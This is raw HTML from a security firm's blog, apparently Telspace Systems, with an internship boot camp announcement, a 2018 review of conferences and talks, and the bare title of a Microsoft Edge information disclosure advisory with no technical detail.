<a href="https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf" style="font-family: "trebuchet ms", sans-serif;">https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf</a><br />
<span face=""trebuchet ms" , sans-serif"></span>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-75551719717459736492019-03-05T11:00:00.000+02:002019-03-05T11:25:35.863+02:00Telspace Systems Internship/Boot camp, March 2019<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We are excited and proud to announce that our boot camp / internship kicked off yesterday! <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReJFZSwHGwFK-z-avtgc3U7hog0gE-u1U8j_-yKHDiEgWjmm_QI8Zh1doi7FqmBmDeZD2hBhSSICDQlFiutLmVJ3D9hmfztrIsGoJXICTYl7CGgca0xgqX9Dzcije3jTtJsgDe0naIJSO/s1600/IMG_20190304_143323.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1600" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjReJFZSwHGwFK-z-avtgc3U7hog0gE-u1U8j_-yKHDiEgWjmm_QI8Zh1doi7FqmBmDeZD2hBhSSICDQlFiutLmVJ3D9hmfztrIsGoJXICTYl7CGgca0xgqX9Dzcije3jTtJsgDe0naIJSO/s320/IMG_20190304_143323.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">After approximately 100 thorough interviews, which covered a number of areas, we have secured 10 new interns. The areas we covered during the interview stage, to name a few, were: <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">Networking, Linux, Windows, Software Development and Exploitation, Cryptography and general information security knowledge. <u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">From a statistics perspective, the weakest area identified was cryptography (a future post on interview statistics is planned!)<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We believe our internship / boot camp surpasses the industry “norm” due to the following reasons:<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<br />
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">Our internships don’t have any monetary restraint attached to them, and interns will be paid a monthly salary whilst they are undertaking the training with us. There are also no restraints where the interns will have to pay back money if they don’t work for Telspace for a period of time. Doing anything else but this would only benefit the company itself, rather than the community. </span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">If interns don’t feel they are a match at Telspace Systems during the boot camp, they are free to go, taking with them the knowledge that we passed on to them as well as any certifications (and we are more than happy with that!).</span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">Should our interns pass the assessment criteria at the end of the boot camp, via different assessment gateways (including a research gateway), they will be offered a full-time junior analyst position at Telspace Systems (which they don’t have to take!). With this offer there will be additional training / certifications provided.</span></li>
</ul>
<ul style="font-size: 14px; margin-top: 0in;" type="disc">
<li class="MsoNormal"><span style="font-family: "trebuchet ms" , sans-serif;">This boot camp is about growing the community, and thereafter, our company in order to service our customers better in the future. </span><span style="font-family: "trebuchet ms" , sans-serif;"> </span></li>
</ul>
<br />
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">We will be hosting a few more boot camps throughout the year, so keep your eyes peeled if you are interested in taking part in one!<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<br /></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "trebuchet ms" , sans-serif;">Good luck to all our new interns, we hope to see many shells and calcs being popped</span><span style="font-family: "calibri" , sans-serif;">!<u></u><u></u></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="font-size: 14px;">
<span style="font-family: "calibri" , sans-serif;"><br /></span></div>
<br class="Apple-interchange-newline" />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-81361603410927346452019-01-09T14:23:00.001+02:002022-12-12T22:36:57.610+02:00Looking back on 2018 and forward to great things in 2019!<h1 style="color: black; font-style: normal; letter-spacing: normal; line-height: 21.4667px; margin: 12pt 0in 6pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<style type="text/css">
@page { margin: 2cm }
p { margin-bottom: 0.25cm; direction: ltr; line-height: 120%; text-align: left; orphans: 2; widows: 2 }
a:link { color: #0000ff }
</style>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">As we enter a new
year Telspace would like to look back on 2018 and thank everyone who
made 2018 a great and exciting year. We have had the pleasure of
attending a number of conferences where we were able to present,
train and share ideas with like-minded individuals. This blog post
provides an overview of some of the highlights this year. If we have
missed anything, let us know in the comments below!
</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">We kicked the
year off by hiring William Boshoff as our Chief Technical Officer
(CTO). This was, and still is, part of our constant drive to
continuously innovate and improve our services to clients. William
believes that cultivating a culture of continual growth, learning and
development directly translates into greater value for Telspace’s
clients.</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">William’s
experience ranges from assessing and consulting in high security
environments, mostly in the finance and government sectors, through
to lecturing and contributing as a subject matter expert on multiple
boards.</span></div>
<div style="font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-size: large;"><span style="font-family: inherit;">In his spare
time, William enjoys contributing to the information security
community by sharing his research, mentoring and developing zero-day
exploits. </span><span style="font-family: "liberation sans" , serif;"> </span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXJ_KvxsKb0brWeSlY1JwQzwcktIinFhyoL7fZKoyvW6fksrYUvjYK2MNSflyaNzv4h_i2gY1AXQ1vI5UHGRvRS4upOIArRCChIayz1rCDtBYjjwg3PayTZz5yG6QSfsvdSZj0L1wjkCGH/s1600/William.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="459" data-original-width="816" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXJ_KvxsKb0brWeSlY1JwQzwcktIinFhyoL7fZKoyvW6fksrYUvjYK2MNSflyaNzv4h_i2gY1AXQ1vI5UHGRvRS4upOIArRCChIayz1rCDtBYjjwg3PayTZz5yG6QSfsvdSZj0L1wjkCGH/s1600/William.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">William Boshoff (Telspace Systems CTO)</span></td></tr>
</tbody></table>
<div style="font-family: "liberation sans", serif; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<div style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
</div>
<div style="break-before: page; line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;"><span style="font-weight: normal;">Telspace has also smashed international borders and expanded
internationally to the UK, Egypt and Palestine! If you are
interested and </span>PASSIONATE<span style="font-weight: normal;">, we are hiring!</span></span></div>
<div class="separator" style="clear: both; font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1JR0rGd_BSZW1j23DtItDYrTW9lVMJDAJBvolZ71rdqXzdFYvF4nVMLn-K8YHIBOuU8c120kIpma7Mj-tmUO0CHY-pL5taVPpXTtVRtzBgRoBT6MThDHP9xnqs5zfAnmsUZWf46suzTw/s1600/GlobalTS.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="568" data-original-width="1125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1JR0rGd_BSZW1j23DtItDYrTW9lVMJDAJBvolZ71rdqXzdFYvF4nVMLn-K8YHIBOuU8c120kIpma7Mj-tmUO0CHY-pL5taVPpXTtVRtzBgRoBT6MThDHP9xnqs5zfAnmsUZWf46suzTw/s1600/GlobalTS.png" /></a></div>
<div style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
</h1>
<h2 style="line-height: 115%; margin-bottom: 0.35cm;">
Local is Lekker</h2>
<div>
<div>
<span style="font-size: large;"><span style="font-family: inherit;">Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this Telspace sponsored BSides Cape Town 2018, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG).</span> </span></div>
<div>
<span style="font-size: large;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYpC9Cy8zBS9zk2SSN53mszReUdRcnxnXxr311ZRpzm4H1h3LTnQ8DrkwJkkObu0wp3mLMmhSQwKptcJu2ZtJvgWwFaQ_miqTE4KBP0DzXuV_WLhyphenhyphenJMhhEVSENpIofkfuUK270tGrm8kxB/s1600/crew.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="955" data-original-width="789" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYpC9Cy8zBS9zk2SSN53mszReUdRcnxnXxr311ZRpzm4H1h3LTnQ8DrkwJkkObu0wp3mLMmhSQwKptcJu2ZtJvgWwFaQ_miqTE4KBP0DzXuV_WLhyphenhyphenJMhhEVSENpIofkfuUK270tGrm8kxB/s1600/crew.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Telspace Crew at BSides Cape Town 2018 (left to right): Manny Corregedor, Derek Scott, Ayaz Saiyed</span></td></tr>
</tbody></table>
<div>
<span style="font-size: large;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWh7INfdRyLuHn8UGCxikpQweG4aqHo6_fHKl9lztSleMd_45kOadMRUMMLCCHkxtN7nWKRot3oRBsovz3KQPmErTr-3Ljpk9IGCpSSxypwqFzMAC_izJix6Axm7jQ_7FlfZaIc92y5j3/s1600/SelfiesEffectsCartoon.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="775" data-original-width="1026" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmWh7INfdRyLuHn8UGCxikpQweG4aqHo6_fHKl9lztSleMd_45kOadMRUMMLCCHkxtN7nWKRot3oRBsovz3KQPmErTr-3Ljpk9IGCpSSxypwqFzMAC_izJix6Axm7jQ_7FlfZaIc92y5j3/s1600/SelfiesEffectsCartoon.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Some “selfies for charity” at BSides Cape Town 2018</span></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: inherit; font-size: large;">Telspace also spoke at ITWeb’s Security Summit 2018, gave training (Ethical Hacking 101) and exhibited. Our CEO, Dino Covotsos and COO, Manny Corregedor, were both part of the advisory board for 2018. The conference was well attended and had great international speakers such as Mikko Hyppönen, April Wright, Jayson Street and Rodrigo Branco who gave keynotes.</span></div>
<div>
<span style="font-family: inherit; font-size: large;"><br /></span></div>
<div>
<span style="font-family: inherit; font-size: large;">We also got the opportunity to catch up with the international speakers who are old / good friends of Telspace Systems employees, and made a charitable donation to CANSA for every Telspace t-shirt that was given away to attendees that visited our stand. We also exhibited at the Department of Defence supplier day, which was well attended.</span></div>
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpLwQkLbt9PzzDFkSzGXGsOHFTW8GBDjE0g6lahU4C_W3Ck6GkENkvzhMdYIq5r4tLg2oUdjMeadh7xaBgHEaIfFooLN8i33um6bo-kJgL-qcXSC89Wl3jxE8lkdMiVIqTiQcGtkEeighF/s1600/IMG_20180523_104751.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="696" data-original-width="1238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpLwQkLbt9PzzDFkSzGXGsOHFTW8GBDjE0g6lahU4C_W3Ck6GkENkvzhMdYIq5r4tLg2oUdjMeadh7xaBgHEaIfFooLN8i33um6bo-kJgL-qcXSC89Wl3jxE8lkdMiVIqTiQcGtkEeighF/s1600/IMG_20180523_104751.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Tarryn Hardman (Telspace Systems), Sibusiso Nxumalo (Former-Telspace Systems Employee), Rodrigo Branco (Intel), Manny Corregedor (Telspace Systems)</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9Xeyr3KH-pQXo5UTncmkDUW55BRj2nmYuH8axIZqloxKy5_Mq_3pc7ZYTsgeXMCCNNRg5Fg7PF4B1CNFOyIHLj2uDIDqZHezq6-qNzJxtcJm6B_NpqrQskORvLYp9nEwmcp86XvOwPQa/s1600/ITWeb-Mikko.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9Xeyr3KH-pQXo5UTncmkDUW55BRj2nmYuH8axIZqloxKy5_Mq_3pc7ZYTsgeXMCCNNRg5Fg7PF4B1CNFOyIHLj2uDIDqZHezq6-qNzJxtcJm6B_NpqrQskORvLYp9nEwmcp86XvOwPQa/s1600/ITWeb-Mikko.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Mikko Hyppönen (F-Secure), Dino Covotsos (Telspace Systems)</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVgXcKfz1T897V6eFuK9PuppJyoFgBudRs_f0evM45aWl-fwBr0CuYg-8Tj87pCe7npJfrlWp7equp76zp72Yg_t_tkzZD9TOZoADQJv8X6hC3Bj1Bdig5wHVCYLE8RR25xgvJdtXoscJh/s1600/Dd4haihVwAcB7La.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVgXcKfz1T897V6eFuK9PuppJyoFgBudRs_f0evM45aWl-fwBr0CuYg-8Tj87pCe7npJfrlWp7equp76zp72Yg_t_tkzZD9TOZoADQJv8X6hC3Bj1Bdig5wHVCYLE8RR25xgvJdtXoscJh/s1600/Dd4haihVwAcB7La.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Manny Corregedor (Telspace Systems) giving a talk on ‘Information Security Cakes’ at the ITWeb Security Summit 2018</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<br />
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1tAa1mLYanGMYmsAQhCqI4HHdOx1eQHrXLd27FC6XRhkvQS0OLBYRU4ObjiriHYy7VnfS_ODwFi7NY4yenGNzQ7regqcewvdmdNKvmafaJ8757Ib9KSDM6qoXnk9cF2Pw7A_Ox8rqn9x/s1600/DOD.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="711" data-original-width="1050" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz1tAa1mLYanGMYmsAQhCqI4HHdOx1eQHrXLd27FC6XRhkvQS0OLBYRU4ObjiriHYy7VnfS_ODwFi7NY4yenGNzQ7regqcewvdmdNKvmafaJ8757Ib9KSDM6qoXnk9cF2Pw7A_Ox8rqn9x/s1600/DOD.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Telspace Systems Stand at the Department of Defence Supplier Day 2018</span></td></tr>
</tbody></table>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-size: 14pt;"><br /></span></div>
<h1 style="font-family: "liberation sans", serif; font-size: 14pt; font-weight: normal; line-height: 21.4667px; margin: 12pt 0in 6pt;">
</h1>
<h2 style="line-height: 32.2px; margin-bottom: 0.35cm;">
Going abroad!</h2>
<h1 style="color: black; font-style: normal; font-weight: normal; letter-spacing: normal; line-height: 21.4667px; margin: 12pt 0in 6pt; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Throughout the
year we also participated in international
conferences, round table events and provided comments on news stories
in the media.</span></div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">In addition to
supporting local events, we also attended Blackhat, Defcon 26 and
BSides in Las Vegas.
</span></div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Our CEO Dino
Covotsos also gave talks at:</span><br />
<ul>
<li><span style="font-family: inherit; font-size: large;">Defcon 26
2018 – Recon Village (Las Vegas, USA)</span></li>
<li><span style="font-family: inherit; font-size: large;">Hack In
The Box 2018 (Dubai)</span></li>
<li><span style="font-family: inherit; font-size: large;">Hackers to
Hackers 2018, H2HC (Sao Paulo, Brazil)</span></li>
</ul>
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
</div>
<div style="line-height: 115%; margin-bottom: 0.35cm;">
<span style="font-family: inherit; font-size: large;">Dino was also
listed as one of the security researchers that was thanked by the
Microsoft Security Response Center (MSRC) in recognition of making
Microsoft online services safer by finding and reporting security
vulnerabilities. More information at:
<a href="https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive">https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive</a></span></div>
<div style="font-family: "liberation sans", serif; line-height: 115%; margin-bottom: 0.35cm;">
<div style="font-size: 14pt;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7UcGKERJRox4T-HidXQ6JEjGURIuJybU-fR1OYAEhCh3yxUIQWi8K7OACwlqEd2BWo9qW4AOAky3M3uH2VUJ5y4IP1OFS5qAnJJZNTAgQiQyzb0MRR_Meic5zT105eCPjvBQknq2CrnB/s1600/Dp-pwZOUwAAXR-0.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7UcGKERJRox4T-HidXQ6JEjGURIuJybU-fR1OYAEhCh3yxUIQWi8K7OACwlqEd2BWo9qW4AOAky3M3uH2VUJ5y4IP1OFS5qAnJJZNTAgQiQyzb0MRR_Meic5zT105eCPjvBQknq2CrnB/s1600/Dp-pwZOUwAAXR-0.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dino Covotsos giving a talk on Hacking the RFQ Process at Hackers to Hackers (Brazil)</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI1YZqe0YNQqH5tMepgI-682qQ5-NBnp5jIhn1JmQloTETK8EbLbYhTtnWPqRBzhVqVyphCbEwCCC9ikoh6g8vjTXjEb8aSCq_sD-iknE4SDgbWuQZUCsQSx6SnGwq-NRWzXDVWPpUOR4jEMi05a-MvSNUM2h68hlK8P5rLAhFfxU9FuPHb5IPuEjGUA/s720/H2H.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="720" data-original-width="598" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI1YZqe0YNQqH5tMepgI-682qQ5-NBnp5jIhn1JmQloTETK8EbLbYhTtnWPqRBzhVqVyphCbEwCCC9ikoh6g8vjTXjEb8aSCq_sD-iknE4SDgbWuQZUCsQSx6SnGwq-NRWzXDVWPpUOR4jEMi05a-MvSNUM2h68hlK8P5rLAhFfxU9FuPHb5IPuEjGUA/s16000/H2H.jpg" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Left to right: Dino Covotsos (Telspace Systems), Rodrigo Branco (Intel)<br /></td></tr></tbody></table><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfMRVZBlEJlh6kgjHPiUHi2XwU7BU6a3vXO9HzWeRXDmjB-gek_JQAz7WYjGhA-r78xxNLSANLxN5QFmpx9u41AXQaSHLbz5izddA0YOX1orrckIuPMR2tFP881nSIAe6odI5uULsRn9o/s1600/H2H.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivfMRVZBlEJlh6kgjHPiUHi2XwU7BU6a3vXO9HzWeRXDmjB-gek_JQAz7WYjGhA-r78xxNLSANLxN5QFmpx9u41AXQaSHLbz5izddA0YOX1orrckIuPMR2tFP881nSIAe6odI5uULsRn9o/s1600/H2H.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">SACICON 2018 Badges<br /><br /></span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 14pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3rXBBMtisrW5prm2Yo53XeKdn2ogRuRuMPQXGGsoRVvNJ4bxHQW0rI2-WNN-3wTdrBWFrbA9yjgnV8aFAPPRMLM25Ob9NZQTDqcTXRdNiTxpQAY0TfTl-6GSuzHeQDlKVkhIWVO3wRT7/s1600/Defcon.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu3rXBBMtisrW5prm2Yo53XeKdn2ogRuRuMPQXGGsoRVvNJ4bxHQW0rI2-WNN-3wTdrBWFrbA9yjgnV8aFAPPRMLM25Ob9NZQTDqcTXRdNiTxpQAY0TfTl-6GSuzHeQDlKVkhIWVO3wRT7/s1600/Defcon.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Left to right: Jayson Street, Nina Alli and Dino Covotsos at SACICON (Brazil)</span></td></tr>
</tbody></table>
</div><div class="separator" style="clear: both; text-align: center;"><br /></div>
</h1>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhC9qmGw4p3kxJNeBZcA_7ybrAB4zPEpd6VGeY1oMutDKWk3QHYpJrDWri6KOJHJ4GxxkEaOi4kEebJ2sCw1d5ysiKIu_jPBjlzeOIBk8Sm9pwieTbPwXleyC2glc840XMjlS_N0gBIwp5/s1600/HITB.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1200" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhC9qmGw4p3kxJNeBZcA_7ybrAB4zPEpd6VGeY1oMutDKWk3QHYpJrDWri6KOJHJ4GxxkEaOi4kEebJ2sCw1d5ysiKIu_jPBjlzeOIBk8Sm9pwieTbPwXleyC2glc840XMjlS_N0gBIwp5/s1600/HITB.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Hack In The Box 2018 (Dubai)</span></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLatbTD_v1JLOgRv19CfihC8_eeuW_8ITX6_oSUo2RqT78M7BU2kSd5E-HhfLyeyolLmumqlTqhP0FRkN6_pK11hsXpBaZZ-iBbiq8TKIhcEfNjvn__1XkyRm4Ljo2J4gY51ratiRfB5xQ/s1600/HITB.JPG" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1080" data-original-width="1080" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLatbTD_v1JLOgRv19CfihC8_eeuW_8ITX6_oSUo2RqT78M7BU2kSd5E-HhfLyeyolLmumqlTqhP0FRkN6_pK11hsXpBaZZ-iBbiq8TKIhcEfNjvn__1XkyRm4Ljo2J4gY51ratiRfB5xQ/s1600/HITB.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Dino Covotsos giving a talk on Hacking the RFQ Process at Hack In The Box 2018 (Dubai)</span></td></tr>
</tbody></table>
<br />
<h2>
Thank you!</h2>
<br />
<span style="font-family: inherit; font-size: large;">We would like to thank everyone who made our 2018 so amazing: a huge thank you to our staff, clients, employees, friends and, most importantly, the local Information Security community. We wish you all the best and a prosperous 2019.</span><br />
<br />Posted by Unknown (noreply@blogger.com), 57 6th Rd, Hyde Park, Johannesburg, 2196, South Africa<br />
<br />Telspace Systems Security Advisory (TSA-2018-002) (published 2018-03-07T13:05:00.000+02:00, updated 2018-03-07T13:05:42.773+02:00)<br />
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYiGmr0w1YPeJlzL2hKDqoFq8xpmo-v2hUXmR28OaxmOdYutlz6XDbii7of5Dz43Nt6LNogaCN7-NR0MjI3i2dZVrEUSShE6hj_zh-qDiiDtUkc7ZVzCqCYA_Eo5lAbTnSFpcXKVQN0XKy/s1600/Telspace.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="467" data-original-width="761" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYiGmr0w1YPeJlzL2hKDqoFq8xpmo-v2hUXmR28OaxmOdYutlz6XDbii7of5Dz43Nt6LNogaCN7-NR0MjI3i2dZVrEUSShE6hj_zh-qDiiDtUkc7ZVzCqCYA_Eo5lAbTnSFpcXKVQN0XKy/s320/Telspace.jpg" width="320" /></a></div>
<h2 style="text-align: center;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Security Advisory</span></b></h2>
</div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
<div class="western" style="background-color: white; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>TSA-2018-002: </b>Microsoft Edge Information Disclosure Vulnerability</span></div>
<div class="western" style="background-color: white; font-size: 14px; line-height: 14px; margin: 0px 0px 0cm; outline: none; padding: 0px; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
